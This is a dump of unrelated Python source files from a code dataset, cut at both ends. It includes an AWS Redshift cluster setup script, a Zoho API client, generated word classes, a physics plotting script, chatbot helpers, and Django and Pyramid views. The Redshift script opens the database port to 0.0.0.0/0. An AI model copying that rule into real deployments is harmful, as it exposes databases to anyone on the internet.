region_name=\"us-east-1\",\n aws_access_key_id=db_config.KEY,\n aws_secret_access_key=db_config.SECRET\n )\n\niam_resource = boto3.client('iam',\n region_name='us-east-1', \n aws_access_key_id=db_config.KEY,\n aws_secret_access_key=db_config.SECRET\n )\n\nredshift_resource = boto3.client('redshift',\n region_name=\"us-east-1\",\n aws_access_key_id=db_config.KEY,\n aws_secret_access_key=db_config.SECRET\n )\n\n#roleArn = db_config.DWH_ARN\nroleArn = iam_resource.get_role(RoleName=db_config.DWH_IAM_ROLE_NAME)['Role']['Arn']\n\ntry:\n response = redshift_resource.create_cluster( \n #HW\n ClusterType=db_config.DWH_CLUSTER_TYPE,\n NodeType=db_config.DWH_NODE_TYPE,\n NumberOfNodes=int(db_config.DWH_NUM_NODES),\n\n #Identifiers & Credentials\n DBName=db_config.DWH_DB,\n ClusterIdentifier=db_config.DWH_CLUSTER_IDENTIFIER,\n MasterUsername=db_config.DWH_DB_USER,\n MasterUserPassword=db_config.DWH_DB_PASSWORD,\n \n #Roles (for s3 access)\n IamRoles=[roleArn] \n )\nexcept Exception as e:\n print(e)\n\ncluster_status = response['Cluster']['ClusterStatus']\nif cluster_status == 'creating':\n creating_cluster = True\n while creating_cluster:\n response = redshift_resource.describe_clusters(ClusterIdentifier=db_config.DWH_CLUSTER_IDENTIFIER)\n cluster_status = response['Clusters'][0]['ClusterStatus']\n if cluster_status == 'available':\n creating_cluster = False\n print(cluster_status)\n else:\n print(\"Waiting while cluster is... \",cluster_status)\n time.sleep(60)\n \n#Get cluster properties\nmyClusterProps = redshift_resource.describe_clusters(ClusterIdentifier=db_config.DWH_CLUSTER_IDENTIFIER)\n\n#Open an incoming TCP port to access the cluster endpoint\n\ntry:\n secgrp_id = myClusterProps['Clusters'][0]['VpcSecurityGroups'][0]['VpcSecurityGroupId']\n #print('secgrp_id is: ', secgrp_id)\n secgrp_value = 'ec2.SecurityGroup(id=' + \"'\" + secgrp_id + \"')\"\n #print('secgrp_value is: ', secgrp_value)\n vpc_id = myClusterProps['Clusters'][0]['VpcId']\n vpc = ec2_resource.Vpc(id=vpc_id)\n #print('vpc is: ', vpc)\n secgrp_list = list(vpc.security_groups.all())\n #print(secgrp_list)\n for secgrp_item in secgrp_list:\n if str(secgrp_item) == secgrp_value:\n defaultSg_resource = secgrp_item\n \n #vpc = ec2_resource.Vpc(id=myClusterProps['Clusters'][0]['VpcId'])\n #defaultSg_id = myClusterProps['Clusters'][0]['VpcSecurityGroups'][0]['VpcSecurityGroupId']\n #defaultSg_resource = vpc.security_groups.filter(GroupIds=[defaultSg_id])\n #defaultSg = list(vpc.security_groups.all())[0]\n #list(vpc.security_groups.all())[0]\n print(defaultSg_resource)\n defaultSg_resource.authorize_ingress(\n GroupName=defaultSg_resource.group_name,\n CidrIp='0.0.0.0/0',\n IpProtocol='TCP',\n FromPort=int(db_config.DWH_PORT),\n ToPort=int(db_config.DWH_PORT)\n )\nexcept Exception as e:\n print(e)\n\n\n\n ","sub_path":"redshift/gblevntdata_rshift_clust_create.py","file_name":"gblevntdata_rshift_clust_create.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"297576397","text":"import ast\nimport json\n\nimport requests\nfrom cachetools import TTLCache\nfrom requests import HTTPError\n\nfrom utils.constants import DEFAULT_CACHE_MODE, DEFAULT_CACHE_TTL, ZOHO_AUTH_HEADER, ZOHO_AUTH_TOKEN_HEADER_PREFIX, \\\n ZOHO_ORG_ID_HEADER, ZOHO_SUBSCRIPTION_API_URL, DEFAULT_CACHE_MAXSIZE\n\n\nclass Client:\n def __init__(self, config):\n self.auth_token = config[\"authtoken\"]\n self.zoho_org_id = config[\"zohoOrgId\"]\n try:\n self.cache_enabled = config[\"cache_enabled\"]\n except KeyError:\n self.cache_enabled = DEFAULT_CACHE_MODE\n\n try:\n self.cache_ttl = config[\"cache_ttl\"]\n except KeyError:\n self.cache_ttl = DEFAULT_CACHE_TTL\n self.requests = requests.Session()\n self.cache = TTLCache(ttl=self.cache_ttl, maxsize=DEFAULT_CACHE_MAXSIZE)\n\n def add_to_cache(self, key, value):\n if (self.cache_enabled is None) or (self.cache_enabled is False):\n pass\n else:\n self.cache[key] = value\n\n def get_from_cache(self, key):\n if (self.cache_enabled is None) or (self.cache_enabled is False):\n return None\n else:\n try:\n return self.cache[key]\n except KeyError:\n return None\n\n def delete_from_cache(self, key):\n if (self.cache_enabled is None) or (self.cache_enabled is False):\n return False\n else:\n try:\n self.cache.pop(key=key)\n return True\n except KeyError:\n return False\n # my_key = ast.literal_eval(key)\n # return self.cache.pop(key=key)\n\n def get_request_headers(self, headers):\n default_headers = {\n ZOHO_AUTH_HEADER: ZOHO_AUTH_TOKEN_HEADER_PREFIX + self.auth_token,\n ZOHO_ORG_ID_HEADER: self.zoho_org_id,\n 'Content-Type': \"application/json\"\n }\n if (headers is not None) and len(headers) > 0:\n default_headers.update(headers)\n return default_headers\n\n def send_request(self, method, uri, data=None, headers=None):\n try:\n response = requests.request(method, ZOHO_SUBSCRIPTION_API_URL + uri, data=json.dumps(data),\n headers=self.get_request_headers(headers))\n response.raise_for_status()\n\n except HTTPError as http_err:\n return http_err\n except Exception as err:\n return None\n if response.headers['Content-Type'] == 'application/json;charset=UTF-8':\n return json.loads(response.text)\n else:\n return response.content\n\n","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"412091041","text":"\n\n#calss header\nclass _QUOTIENT():\n\tdef __init__(self,): \n\t\tself.name = \"QUOTIENT\"\n\t\tself.definitions = [u'a particular degree or amount of something: ', u'the result of dividing one number by another']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_quotient.py","file_name":"_quotient.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"259280349","text":"from __future__ import print_function\nfrom __future__ import division\nimport sys\n\nimport numpy as np\n\nfrom ROOT import TFile, TH1, TKey\n\nfrom PlotUtils import *\n#from Cuts2018 import *\n#from Cuts2017 import *\n#from Cuts2016 import *\nfrom Cuts2012 import *\n\n\nmpl.rcParams[\"legend.fontsize\"] = \"x-large\"\n\n##\n## SAMPLE INFO\n##\n\nselection = [\"4l\"]\n\nnameTeX = {\"b_z1m\":r\"m_{\\mathrm{Z}_{1}}\", \"b_z2m\":r\"m_{\\mathrm{Z}_{2}}\",\n \"b_l1p\":r\"p_{\\ell_{1}}\", \"b_ttm\":r\"m_{\\ell_{2,3,4}}\",\n \"angle_z1l2_z2\":r\"\\beta\", \"angle_z1leps\":r\"\\alpha_{\\mathrm{Z}_{1}}\",\n \"angle_z2leps\":r\"\\alpha_{\\mathrm{Z}_{2}}\",\n \"cos_theta_z1\":r\"\\cos\\theta_{\\mathrm{Z}_{1}}\",\n \"cos_theta_z2\":r\"\\cos\\theta_{\\mathrm{Z}_{2}}\",\n \"sin_phi\":r\"\\sin\\phi\", \"sin_phi_10\":r\"\\sin\\phi\"}\n\nT = np.dtype([(sel, object) for sel in selection])\nV = np.dtype([(\"x\", 'f4'), (\"y\", 'f4'), (\"ex\", 'f4'), (\"ey\", 'f4'), (\"b\", 'f4')])\n\nyear = sys.argv[1]\nif year != YEAR_STR:\n print(\"Wrong year in header file\")\n\n\n\n##\n## UNFOLDED DATA\n##\n\nprefix = \"unfolding\"\n\nufName = prefix + \"_\" + year + \".root\"\nufFile = TFile(ufName, \"READ\")\nprint(\"Opened\", ufName)\n\nhnames = [\"b_z1m\", \"b_z2m\", \"b_ttm\", \"b_l1p\", \"cos_theta_z1\", \"cos_theta_z2\", \n \"angle_z1leps\", \"angle_z2leps\", \"angle_z1l2_z2\", \"sin_phi\", \"sin_phi_10\"]\nH = len(hnames)\n\n# Single-parameter result\ninfile = \"combination_1.npz\"\nnpzfile = np.load(infile)\n\nalpha, bf_pred = npzfile['alpha_total'], np.sum(npzfile['bf_pred'])\ndelta_syst = npzfile['delta_syst']\n\n\n# Get histograms\ndata, axe, stat = np.empty(H, dtype=T), np.empty(H, dtype=T), np.empty(H, dtype=T)\nh = 0\n\nfor hname in hnames:\n data[h]['4l'] = ufFile.Get(hname + \"/\" + hname + \"_result\")\n data[h]['4l'].SetDirectory(0)\n data[h]['4l'].SetBinErrorOpt(kPoisson)\n\n stat[h]['4l'] = ufFile.Get(hname + \"/\" + hname + \"_stat\")\n stat[h]['4l'].SetDirectory(0)\n stat[h]['4l'].SetBinErrorOpt(kPoisson)\n\n h = h + 1\nh = 0\n\nufFile.Close()\nprint(\"Got data histograms\")\nprint(\"\")\n\n\n\n##\n## ACC * EFF\n##\n\nprefix = \"migration\"\n\n# Unscaled signal events\nzzName = prefix + \"_\" + year + \"_zz_4l.root\"\nzzFile = TFile(zzName, \"READ\")\nprint(\"Opened\", zzName)\n\naxe = np.empty(H, dtype=T)\nh = 0\n\nfor hname in hnames:\n axe[h][sel] = zzFile.Get(sel + \"/\" + hname + \"_gen\")\n axe[h][sel].SetDirectory(0)\n axe[h][sel].SetName(hname + \"_acc_x_eff\")\n\n h = h + 1\nh = 0\n\nzzFile.Close()\n\n\n# Phase space events\nps = np.empty(H, dtype=T)\nh = 0\n\nprefix = \"4l\"\n\npsName = prefix + \"_\" + year + \"_phase_space.root\"\npsFile = TFile(psName, \"READ\")\nprint(\"Opened\", psName)\n\nsf = INT_LUMI * 1000 * XSEC['zz_4l'] / NGEN['zz_4l']\n\nfor sel in selection:\n for hname in hnames:\n ps[h][sel] = psFile.Get(sel + \"/\" + hname + \"_phase_space\")\n ps[h][sel].SetDirectory(0)\n ps[h][sel].Scale(sf)\n\n h = h + 1\n h = 0\n\npsFile.Close()\n\nprint(\"Got acc * eff histograms\")\nprint(\"\")\n\n\n\n##\n## SCALING\n##\n\nscale = alpha * bf_pred * GAMMA_Z\n\nfor sel in [\"4l\"]:\n for h in range(H):\n axe[h][sel].Divide(ps[h][sel])\n\n for sample in [data, stat]:\n sample[h][sel].Divide(axe[h][sel])\n sample[h][sel].Scale(scale / sample[h][sel].Integral())\n\n ps[h][sel].Scale(scale / ps[h][sel].Integral())\n\n\n# Systemtatic uncertainty\nfor sel in [\"4l\"]:\n for h in range(H):\n\n # Add total systematic\n for i in range(data[h][sel].GetNbinsX()):\n data[h][sel].SetBinError(i + 1,\n np.sqrt((data[h][sel].GetBinContent(i + 1) * delta_syst) ** 2\n + data[h][sel].GetBinError(i + 1) ** 2))\n\n # Get rid of the prediction uncertainty\n for i in range(ps[h][sel].GetNbinsX()):\n ps[h][sel].SetBinError(i+1, 0)\n\n\n# Get ratio\nratio, ratio_stat = np.empty(H, dtype=T), np.empty(H, dtype=T)\n\nfor sel in [\"4l\"]:\n for h in range(H):\n ratio_stat[h][sel] = stat[h][sel].Clone()\n ratio_stat[h][sel].Divide(ps[h][sel])\n\n ratio[h][sel] = data[h][sel].Clone()\n ratio[h][sel].Divide(ps[h][sel])\n\n\n\n\n\n####\n####\n#### LOOP OVER DISTS\n####\n####\n\n\nfor sel in [\"4l\"]:\n lumi = '%.1f' % INT_LUMI\n sqrt_s = '%i' % SQRT_S\n\n\n print(\"Drawing\", sel, \"plots...\")\n\n for h in range(H):\n\n ##\n ## GET BIN CONTENT\n ##\n\n # Data\n v_data = np.zeros(data[h][sel].GetNbinsX(), dtype=V)\n v_stat = np.zeros(data[h][sel].GetNbinsX(), dtype=V)\n for i in range(len(v_data)):\n v_data[i]['x'] = data[h][sel].GetBinCenter(i+1)\n v_data[i]['y'] = data[h][sel].GetBinContent(i+1)\n v_data[i]['ey'] = data[h][sel].GetBinError(i+1)\n v_stat[i]['ey'] = stat[h][sel].GetBinError(i+1)\n\n # MC\n v_pred = np.zeros(ps[h][sel].GetNbinsX(), dtype=V)\n for i in range(len(v_pred)):\n v_pred[i]['x'] = ps[h][sel].GetBinLowEdge(i+1)\n v_pred[i]['y'] = ps[h][sel].GetBinContent(i+1)\n v_pred[i]['ey'] = ps[h][sel].GetBinContent(i+1)\n\n # Ratio\n v_ratio = np.zeros(ratio[h][sel].GetNbinsX(), dtype=V)\n v_ratio_stat = np.zeros(ratio[h][sel].GetNbinsX(), dtype=V)\n for i in range(len(v_ratio)):\n v_ratio[i]['x'] = ratio[h][sel].GetBinCenter(i+1)\n v_ratio[i]['ex'] = ratio[h][sel].GetBinWidth(i+1) / 2\n v_ratio[i]['y'] = ratio[h][sel].GetBinContent(i+1)\n v_ratio[i]['ey'] = ratio[h][sel].GetBinError(i+1)\n v_ratio_stat[i]['ey'] = ratio_stat[h][sel].GetBinError(i+1)\n\n\n\n ##\n ## MAKE PLOTS\n ##\n\n width = data[h][sel].GetBinWidth(1)\n\n fig, (ax_top, ax_bot) = plt.subplots(2, sharex = True, gridspec_kw = lRatioGridSpec)\n fig.subplots_adjust(left = lLeftMargin, right = lRightMargin, bottom = lBottomMargin,\n top = lTopMargin, hspace = lHorizSpace\n )\n\n # Top plots\n p_pred = ax_top.errorbar( v_data['x'], v_pred['y'], xerr = v_ratio['ex'], \n linewidth = 0, ecolor = lBlue,\n fmt = 'None', capsize = lCapSize,\n elinewidth = 2 * lErrorLineWidth4l\n )\n ax_top.errorbar( v_data['x'], v_data['y'], yerr = v_data['ey'],\n linewidth = 0, ecolor = '#C0C0C0', elinewidth = 4 * lErrorLineWidth4l,\n marker = None, capsize = 0\n )\n p_data = ax_top.errorbar( v_data['x'], v_data['y'], yerr = v_stat['ey'], \n linewidth = 0, ecolor = lMarkerColor, elinewidth = lErrorLineWidth4l,\n marker = 'o', capsize = lCapSize, markersize = lMarkerSize2l,\n markeredgecolor = lMarkerColor, markerfacecolor = lMarkerColor\n )\n\n top_min, top_max = ax_top.get_ylim()\n\n if hnames[h] in [\"b_ttm\", \"angle_z1l2_z2\", \"sin_phi\"]:\n top_max = 3.5\n elif hnames[h] == \"b_l1p\":\n top_max = 5.5\n elif hnames[h] in [\"b_z1m\", \"sin_phi_10\"]:\n top_max = 5\n elif hnames[h] == \"b_z2m\":\n top_max = 10\n elif hnames[h] == \"angle_z1leps\":\n top_max = 8\n elif hnames[h] in [\"angle_z2leps\", \"cos_theta_z1\"]:\n top_max = 4\n elif hnames[h] in [\"cos_theta_z2\"]:\n top_max = 3\n\n ax_top.set_ylim(0, top_max)\n\n\n # Ratio plot\n\n ax_bot.set_ylim(lRatioMin4l, lRatioMax4l)\n\n ax_bot.axhline(lRatioMid, color = lBlue, linewidth = 2 * lErrorLineWidth4l)\n ax_bot.errorbar(v_ratio['x'], v_ratio['y'], yerr = v_ratio['ey'],\n linewidth = 0, ecolor = '#C0C0C0', elinewidth = 4 * lErrorLineWidth4l,\n marker = None, capsize = 0\n )\n ax_bot.errorbar(v_ratio['x'], v_ratio['y'], yerr = v_ratio_stat['ey'],\n linewidth = 0, ecolor = lMarkerColor, elinewidth = lErrorLineWidth4l,\n marker = 'o', capsize = lCapSize, markersize = lMarkerSize2l,\n markeredgecolor = lMarkerColor, markerfacecolor = lMarkerColor\n )\n\n\n\n ##\n ## LABELS\n ##\n\n # Titles\n ax_top.text(0.025, 0.95, \"CMS\",\n size = \"xx-large\", weight = \"bold\",\n verticalalignment = 'top', transform = ax_top.transAxes, usetex = False)\n ax_top.text(0.025, 0.875, \"Work in Progress\",\n size = \"x-large\", style = \"italic\",\n verticalalignment = 'top', transform = ax_top.transAxes, usetex = False)\n ax_top.set_title(r'\\Large{' + lumi + r'\\,fb$^{-1}$ (' + sqrt_s + r'\\,TeV, ' + YEAR_STR + ')}',\n loc='right')\n\n # Shared x axis\n if hnames[h] in [\"b_l1p\", \"b_ttm\", \"b_z1m\", \"b_z2m\"]:\n xtitle = \"$\" + nameTeX[hnames[h]] + \"$ (GeV)\"\n ytitle = r\"$d\\Gamma/d\" + nameTeX[hnames[h]] + r\"$ (keV$/$GeV)\"\n elif hnames[h] in [\"angle_z1leps\", \"angle_z2leps\", \"angle_z1l2_z2\"]:\n xtitle = \"$\" + nameTeX[hnames[h]] + \"$ ($\\pi$ rad)\"\n ytitle = r\"$d\\Gamma/d\" + nameTeX[hnames[h]] + r\"$ (keV$/\\pi$ rad)\"\n elif hnames[h] in [\"cos_theta_z1\", \"cos_theta_z2\", \"sin_phi\", \"sin_phi_10\"]:\n xtitle = \"$\" + nameTeX[hnames[h]] + \"$\"\n ytitle = r\"$d\\Gamma/d\" + nameTeX[hnames[h]] + r\"$ (keV$/$unit)\"\n\n ax_bot.set_xlabel(xtitle, horizontalalignment='right')\n ax_bot.xaxis.set_label_coords(1, -0.3)\n\n # Top y axis\n ax_top.set_ylabel(ytitle, horizontalalignment='right')\n if hnames[h] in [\"b_ttm\", \"b_l1p\", \"angle_z1leps\", \"angle_z2leps\", \"cos_theta_z1\",\n \"cos_theta_z2\", \"b_z1m\", \"b_z2m\"]: \n ax_top.yaxis.set_label_coords(-0.065, 1)\n else:\n ax_top.yaxis.set_label_coords(-0.08, 1)\n ax_top.minorticks_on()\n\n # Bottom y axis\n ax_bot.set_ylabel(r'Data$/$MC')\n ax_bot.yaxis.set_label_coords(-0.08, 0.5)\n\n \n\n ##\n ## TICKS\n ##\n\n # x axes\n plt.xlim(v_pred['x'][0], v_pred['x'][-1] + width)\n\n major_step, minor_step = 2 * width, width\n if sel == \"4e\":\n major_step = width\n\n for ax in [ax_bot.xaxis, ax_top.xaxis]:\n ax.set_ticks( np.arange(\n v_pred['x'][0],\n v_pred['x'][-1] + major_step,\n step = major_step)\n )\n ax.set_ticks( np.arange(\n v_pred['x'][0],\n v_pred['x'][-1] + minor_step,\n step = minor_step),\n minor = True)\n\n # Top y axis\n# ax_top.ticklabel_format(axis = 'y', style = 'sci')\n# ax_top.yaxis.get_major_formatter().set_powerlimits((0, 1))\n\n # Bottom y axis\n ax_bot.yaxis.set_ticks( np.arange(lRatioMin4l+0.5, lRatioMax4l, step = 0.5) )\n\n\n\n ##\n ## LEGEND\n ##\n\n if hnames[h] in [\"angle_z1leps\", \"b_l1p\"]:\n leg_loc = 'center left'\n# elif hnames[h] in [\"cos_theta_z1\", \"cos_theta_z2\"]:\n# leg_loc = 'upper center'\n else:\n leg_loc = 'upper right'\n\n if year == \"2017\" and hnames[h] == \"zzm\" and sel == \"4e\":\n leg_loc = 'upper right'\n\n ax_top.legend(\n ( p_data, p_pred, ),\n ( 'Measured', 'POWHEG',\n ),\n loc = leg_loc, numpoints = 1, frameon = False)\n\n fig.savefig(year + \"_\" + hnames[h] + \"_ddr.pdf\")\n plt.clf()\n","sub_path":"python/DiffDists.py","file_name":"DiffDists.py","file_ext":"py","file_size_in_byte":11756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"130500291","text":"\n\nfrom xai.brain.wordbase.nouns._dill import _DILL\n\n#calss header\nclass _DILLS(_DILL, ):\n\tdef __init__(self,): \n\t\t_DILL.__init__(self)\n\t\tself.name = \"DILLS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"dill\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_dills.py","file_name":"_dills.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"124207434","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 19 15:34:15 2018\n\n@author: lwuag\n\"\"\"\n\ndef check_start_point(PathInfo, start_point, start_index, Height_pos, Data, threshold):\n col_num = int(Data.shape[2]) \n start_x = start_point // col_num\n start_y = start_point % col_num\n start_replace = start_point\n start_replace_index = start_index\n Stop = False\n if Data[Height_pos, start_x, start_y] >= threshold:\n Stop = True\n Temp = PathInfo[::-1]\n if Stop:\n i = 0\n Flag = False\n while i in range(min(30, len(Temp))) and not Flag:\n print(i)\n if Data[Height_pos, Temp[i]//col_num, Temp[i]%col_num] < threshold:\n Flag = True\n start_replace = Temp[i]\n start_replace_index = len(PathInfo) - 1 - i\n i = i + 1\n if Flag:\n PathInfo = PathInfo[0: start_replace_index] + [PathInfo[start_replace_index]] * (len(PathInfo) - start_replace_index)\n return start_replace, PathInfo\n \n \n ","sub_path":"Functions/Licheng/check_start_point.py","file_name":"check_start_point.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"604002701","text":"HEADERS = ['chapter']\r\nHUGE_VALUE = 10000\r\n\r\nclass NonSupportedBlockError(ValueError): pass\r\n\r\nclass Block:\r\n # loc: tuple of start and end line number (st, en)\r\n # loc = (-1,0) is for the first block containing the empty lines at\r\n # the beginning of the document in its self.emptyafter\r\n def __init__(self, l_lines, emptyafter=0):\r\n self.l_lines = l_lines\r\n self.emptyafter = emptyafter\r\n\r\n self.prev = None\r\n self.next = None\r\n self.dlink = None\r\n self.ulink = None\r\n self.llink = None\r\n self.rlink = None\r\n\r\n def leftmargin(self):\r\n '''Returns the column number of the left margin'''\r\n m = HUGE_VALUE\r\n for i in self.l_lines:\r\n m = min(m,len(i) - len(i.lstrip()))\r\n return m\r\n\r\n def rightmargin(self):\r\n '''Returns the column number of the left margin'''\r\n m = 0\r\n for i in self.l_lines:\r\n m = max(m,len(i))\r\n return m\r\n\r\n def centered(self, margin=None):\r\n '''Returns True if margin was given and if l_lines is centered.\r\n If no margin was given, returns the set of rightmargin(s) at which the content is centered.'''\r\n\r\n # At first it calculates the rightmargin value where the Block would be centered.\r\n # example \"...b\" gives {7}\r\n # \"...bl\" gives {7,8}\r\n c_i = set()\r\n for i in self.l_lines:\r\n c_ii = set()\r\n m = len(i) - len(i.lstrip())\r\n l_l = len(i.strip())\r\n\r\n if l_l % 2 == 0:\r\n # if content length is even value\r\n c_ii.add(l_l + 2*m -1)\r\n else:\r\n c_ii.add(l_l + 2*m +1)\r\n c_ii.add(l_l + 2*m)\r\n\r\n if not c_i:\r\n c_i = c_ii\r\n else:\r\n c_i = c_i & c_ii\r\n\r\n if margin in c_i and self.leftmargin():\r\n return True\r\n elif margin:\r\n return False\r\n else:\r\n return c_i\r\n\r\n def loc(self):\r\n l_n = []\r\n c = 0\r\n curr_pos = self\r\n while curr_pos.llink or curr_pos.ulink:\r\n c += 1\r\n if curr_pos.llink and not curr_pos.ulink:\r\n curr_pos = curr_pos.llink\r\n elif curr_pos.ulink and not curr_pos.llink:\r\n l_n.insert(0, c)\r\n c = 0\r\n curr_pos = curr_pos.ulink\r\n else:\r\n raise BothLeftAndUpLinkExistsError('ulink and rlink are mutually exclusive ATM!')\r\n return l_n\r\n\r\n def raw_content(self):\r\n c = ' '.join(self.l_lines)\r\n c = c.replace('\\u2010 ','') # remove hyphens\r\n while c.find(' ') > -1:\r\n c = c.replace(' ',' ') # trim double spaces\r\n return c.strip()\r\n\r\nclass DocumentHeader(Block):\r\n\r\n class FrontMatter(Block):\r\n\r\n class TitlePage(Block):\r\n def __init__(self):\r\n Block.__init__(self,[''])\r\n\r\n def __init__(self):\r\n Block.__init__(self,[''])\r\n self.titlepage = self.TitlePage()\r\n\r\n\r\n class MainMatter(Block):\r\n def __init__(self):\r\n Block.__init__(self,[''])\r\n\r\n class BackMatter(Block):\r\n def __init__(self):\r\n Block.__init__(self,[''])\r\n\r\n def __init__(self, emptyafter):\r\n Block.__init__(self,[''])\r\n self.emptyafter = emptyafter\r\n self.frontmatter = self.FrontMatter()\r\n self.mainmatter = self.MainMatter()\r\n self.backmatter = self.BackMatter()\r\n\r\nclass Heading(Block):\r\n def nr(self):\r\n loc = [str(i) for i in self.loc()]\r\n return '.'.join(loc)\r\n\r\nclass Author(Heading):\r\n pass\r\n\r\nclass Chapter(Heading):\r\n pass\r\n\r\nclass Title(Heading):\r\n pass\r\n\r\nclass SubTitle(Title):\r\n pass\r\n\r\nclass Paragraph(Block):\r\n def __init__(self, l_lines, emptyafter=0, indent=0):\r\n Block.__init__(self, l_lines, emptyafter)\r\n self.indent = len(self.l_lines[0]) - len(self.l_lines[0].lstrip())\r\n\r\n def nr(self):\r\n loc = [str(i) for i in self.loc()]\r\n return '.'.join(loc[:-1])+':'+loc[-1]\r\n\r\nclass Break(Block):\r\n def __init__(self, l_lines, emptyafter=0):\r\n Block.__init__(self, l_lines, emptyafter)\r\n","sub_path":"src/core/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"327647808","text":"import string\nimport random\n\ndef is_question(input_string):\n \n if '?' in input_string:\n output = True\n else:\n output = False\n return output\n\n\ndef remove_punctuation(input_string):\n \n out_string = ''\n \n for char in input_string:\n if char not in string.punctuation:\n out_string += char\n return out_string\n\n\ndef prepare_text(input_string):\n \n out_list = []\n \n input_string = input_string.lower()\n \n input_string = remove_punctuation(input_string)\n \n out_list = input_string.split()\n \n return out_list\n\ndef selector(input_list, check_list, return_list):\n \n output = None\n \n for item in input_list:\n if item in check_list:\n output = random.choice(return_list)\n break\n return output\n\n\ndef string_concatenator(string1, string2, separator):\n \n output = []\n \n output = string1 + separator + string2\n \n return output\n\n\ndef list_to_string(input_list, separator):\n \n output = input_list[0]\n \n for item in input_list[1:]:\n output = string_concatenator(output, item, separator)\n return output\n\n\ndef end_chat(input_list):\n \n output = bool()\n \n if 'quit' in input_list:\n output = True\n else:\n output = False\n return output\n\n\ndef is_in_list(list_one, list_two):\n \n for element in list_one:\n if element in list_two:\n return True\n return False\n\n\ndef find_in_list(list_one, list_two):\n \n for element in list_one:\n if element in list_two:\n return element\n return None\n\ndef select_language(language_input):\n \"\"\"Lets the user choose the language they prefer.\n \n Parameters\n ----------\n language : dictionary\n name of language used input : language used output\n \"\"\"\n if language_input.lower().startswith('eng'):\n language = 'english'\n elif language_input.lower().startswith('swe'):\n language = 'swedish'\n else:\n raise ValueError\n return language","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"458371701","text":"from django import forms\nfrom core.models.test_dao import TestDAO\nfrom django.forms import SelectDateWidget\n\nimport logging\n\ntestDAO = TestDAO()\nlogger = logging.getLogger(__name__)\n\n\ndef getTestSuitChoices():\n try:\n all_test_suits = testDAO.getAllTestSuites()\n test_suit_ids_lst = [(t.testSuiteId, t.created) for t in all_test_suits]\n TEST_SUIT_CHOICES = tuple(test_suit_ids_lst)\n except Exception as e:\n logger.error(\"Error in stats/forms while getting test suits: %s\" % e)\n return ((None, None),)\n else:\n return TEST_SUIT_CHOICES\n\nclass TestSuiteIdForm(forms.Form):\n test_id = forms.ChoiceField(choices=getTestSuitChoices())\n\n\nclass DatesToCompareForm(forms.Form):\n start_date = forms.DateField(\n widget=SelectDateWidget(years=range(2018,2020))\n )\n end_date = forms.DateField(\n widget=SelectDateWidget(\n years=range(2018, 2020),attrs={'class':'dateWidgetClass'}\n )\n )\n","sub_path":"src/stats/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"643518213","text":"from pyramid.response import Response\nfrom pyramid.view import view_config\nfrom cornice import Service\nimport pyramid.httpexceptions as exc\nimport logging\nimport sqlalchemy.exc\nimport pdb\nimport operator\nimport json\nfrom datetime import datetime\n\nfrom pi_director.models.models import (\n DBSession,\n RasPi,\n Tags\n )\n\nfrom pi_director.controllers.controllers import get_pi_info\n\nfrom pi_director.controllers.user_controls import (\n authorize_user,\n delete_user\n )\n\n\neditMAC = Service(name='PiUrl', path='/ajax/PiUrl/{uid}',\n description=\"Get/Set Pi URL Info\")\n\neditCommands = Service(name='EditPiCommands', path='/ajax/SendCommands/{uid}',\n description='Get/Set sendcommands info')\n\neditCommandResults = Service(name='EditPiCommandResults', path='/ajax/CommandResults/{uid}',\n description='Get/Set sendcommands info')\n\nAuthUser = Service(name='AuthUser', path='/ajax/User/{email}',\n description=\"Set User authentication\")\n\nlogger = logging.getLogger('ajax')\n\n\n@editMAC.get(permission='anon')\ndef view_json_get_pi(request):\n uid = request.matchdict['uid']\n return get_pi_info(uid)\n\n\n@editMAC.delete(permission='admin')\ndef view_json_delete_pi(request):\n uid = request.matchdict['uid']\n DBSession.query(RasPi).filter(RasPi.uuid == uid).delete()\n\n\n@editMAC.post(permission='admin')\ndef view_json_set_pi(request):\n # TODO: move into controller(s)\n uid = request.matchdict['uid']\n response = request.json_body\n\n row = DBSession.query(RasPi).filter(RasPi.uuid == uid).first()\n if row is None:\n row = RasPi()\n row.uuid = uid\n row.url = response['url']\n row.description = response['description']\n row.orientation = response['orientation']\n row.browser = response['browser']\n DBSession.add(row)\n DBSession.flush()\n rowdict = {\n 'uuid': row.uuid,\n 'url': row.url,\n 'description': row.description,\n 'orientation': row.orientation,\n 'browser': row.browser\n }\n return rowdict\n\n\n@editCommands.post(permission='admin')\ndef view_ajax_set_commands(request):\n uid = request.matchdict['uid']\n response = request.json_body\n\n row = DBSession.query(RasPi).filter(RasPi.uuid == uid).first()\n if row is None:\n return '{\"status\":\"error\"}'\n\n # convert response into something with stable sorting\n cmds = []\n tmpcmds = sorted(response.items(), key=operator.itemgetter(0))\n for tmptuple in tmpcmds:\n # extract cmdid/cmd\n cmdid = int(tmptuple[0])\n cmd = tmptuple[1]['cmd']\n del tmptuple[1]['cmd']\n\n # extract 